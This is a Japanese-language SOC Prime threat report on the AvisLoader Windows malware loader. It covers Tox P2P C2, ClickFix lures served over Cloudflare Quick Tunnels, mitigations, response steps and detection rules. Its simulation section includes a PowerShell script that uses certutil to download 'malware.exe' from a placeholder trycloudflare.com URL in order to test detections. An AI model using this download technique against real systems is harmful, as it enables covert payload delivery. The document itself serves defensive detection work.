SOC Prime Bias: High

25 Sep 2026 08:27 UTC

AvisLoaderが堅牢なWindowsマルウェアローダーとして浮上

Author Photo
SOC Prime Team linkedin icon フォローする
AvisLoaderが堅牢なWindowsマルウェアローダーとして浮上
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

概要

AvisLoaderは、新たに確認されたWindowsマルウェアローダーで、Toxピアツーピア(P2P)メッセージングネットワークを使用してコマンド&コントロール(C2)通信を行います。この分散型アプローチにより、オペレーターは固定ドメインや集中型サーバーに依存せずに接続を維持し、コントローラを移動させることができます。マルウェアは通常、Cloudflareインフラストラクチャ上でホストされるClickFixのソーシャルエンジニアリング誘導を通じて配布されます。

調査

Varonis Threat Labsは、露出したステージングサーバー上でローダーをコマンドセンターや関連ツールと共に発見しました。調査では、ユーザーにCloudflare Quick Tunnelsを通じてペイロードを取得するコマンドを実行させるDocuSignをテーマにしたClickFixの誘導が特定されました。実行ファイルの分析により、ToxベースのC2通信、UACバイパス機能、および悪意のあるプロセスを隠すためのモジュールが見つかりました。

緩和策

組織は、端末やWindowsの実行ダイアログにコマンドを貼り付けるよう求めるドキュメント署名のプロンプトを認識して報告するようユーザーを訓練するべきです。セキュリティチームは、ウェブベースの誘導でのCloudflare WorkersやQuick Tunnelsの不審な使用を監視すべきです。予期しないピアツーピア(P2P)ネットワークトラフィックやデスクトップショートカットへの無許可の変更を検出することでもリスクを軽減できます。

対応策

AvisLoader活動が検出された場合、セキュリティチームは不審なドメイン訪問後に起動したコマンドシェルやスクリプト通訳のプロセス系譜を確認するべきです。修正されたショートカットをエンドポイントで検査し、 .backup ファイル、および VLCAssistant アーティファクトを確認します。ネットワークテレメトリを見直し、影響を受けたホストからの異常なToxプロトコルのトラフィックを検討するべきです。

攻撃フロー

この部分はまだ更新中です。

検出

名前に数字のみを含む不審な実行可能ファイル(コマンドライン経由)

SOC Primeチーム
2026年9月24日

不審なTrycloudflareドメイン通信(DNS経由)

SOC Primeチーム
2026年9月24日

不審なCurl実行試行 [MacOS](コマンドライン経由)

SOC Primeチーム
2026年9月24日

検出するためのIOCs(ハッシュSha256):AvisLoaderに出会う: 作戦終了を耐えるWindowsローダー

SOC Prime AIルール
2026年9月24日

予期しないToxまたはピアツーピアトラフィックを検出 [Windowsネットワーク接続]

SOC Prime AIルール
2026年9月24日

コマンドシェルおよびCloudflare Quick Tunnelを通じたリモートコード実行の検出 [Windowsプロセス作成]

SOC Prime AIルール
2026年9月24日

シミュレーション実行

  • 攻撃の流れとコマンド: 敵はワークステーションへの初期アクセスを獲得しました。持続性を維持し、2次的なモジュラーペイロードをダウンロードするために、攻撃者はCloudflare Quick Tunnelを使用して出口フィルタリングを回避します。攻撃者は certutil.exe、ビルトインのWindowsユーティリティを使用して、次の場所からペイロードをダウンロードします: https://malicious-tunnel-id.trycloudflare.com/payload.exe。この方法が選ばれるのは、 certutil が信頼されたバイナリであり、トラフィックが正当なCloudflareインフラストラクチャに向かっているように見えるため、基本的なネットワーク評価フィルターでフラグが立てられにくいからです。

  • 回帰テストスクリプト:

    # 検出ルールをトリガーするシミュレーションスクリプト。
    # certutilを使用してtrycloudflare.comアドレスからのダウンロードを試みます。
    
    $targetUrl = "https://fake-tunnel-id-1234.trycloudflare.com/malware.exe"
    Write-Host "[*] 敵の活動をシミュレート中:certutil経由で$targetUrlからダウンロード中..."
    
    # 以下のコマンドは 'selection_tunnel' および 'selection_tools' 条件をトリガーするよう設計されています。
    certutil.exe -urlcache -split -f "$targetUrl" "$env:TEMPmalware.exe"
    
    if ($LASTEXITCODE -eq 0) {
        Write-Host "[+] シミュレーションコマンドは正常に実行されました。"
    } else {
        Write-Host "[-] コマンドが失敗しました(URLが存在しない場合は予想通りですが、テレメトリは依然として生成されるはずです)。"
    }
  • クリーンアップコマンド:

    # シミュレートされたペイロードとローカルアーティファクトを削除するクリーンアップスクリプト。
    $tempFile = "$env:TEMPmalware.exe"
    if (Test-Path $tempFile) {
        Remove-Item -Path $tempFile -Force
        Write-Host "[+] $tempFile をクリーンアップしました"
    } else {
        Write-Host "[-] クリーンアップするアーティファクトが見つかりませんでした。"
    }